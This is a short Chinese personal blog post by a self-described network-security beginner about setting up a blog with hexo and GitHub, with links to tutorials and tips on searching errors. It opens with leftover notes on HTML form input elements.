< input type=”submit” value=”提交”>//提交按钮
  单选按钮：< input type=”radio”> 标签定义了表单单选框选项。
  复选框：< input type=”checkbox”> 定义了复选框。


hexo搭建博客
2019-03-27T11:24:39.000Z
    本人是学习网络安全的一个萌新，这是第一次写博客还不太熟练，以后会在博客分享记录自己在网络安全道路的学习经历。hexo+github搭建博客也是现在使用比较多、比较好用的方式了（当时学长就是推荐我们使用hexo搭建自己的博客）。
推荐链接：https://url.cn/5W2XCKI   
照着这个一步一步来就可以初步搭好自己的博客了（我就是看的这个搭好了自己的博客）。其中有一点细节需要注意
红线地方输入的时候不是一行，而是
这样自己博客就初步搭好了，后续就是配置、主题等操作了，这里也推荐一个博客：https://blog.csdn.net/wsmrzx/article/details/81478595  博主的hexo系列可以参考一下，当然也可以在网上找，也有很多的关于hexo+github搭建博客的文章。
自己搭建过程中的一些想法
    
在搭建过程中可能会出现一些意外的错误，遇到意外错误可以把出现的错误代码直接复制下来，粘到百度去搜一下，发表一下自己的观点：搭建博客过程中或者学习其他东西遇到错误，一般都是一些小错误，所以在百度的时候首先就看那种简单、篇幅少的文章，去试一下，不要找那些写的特别多的,就会少很多麻烦，也省时间。不得不说百度确实是个好东西，平常遇到的很多问题都可以先去百度一下，解决之后印象也比较深。
    这次博客就写这么多了，我们下篇见！！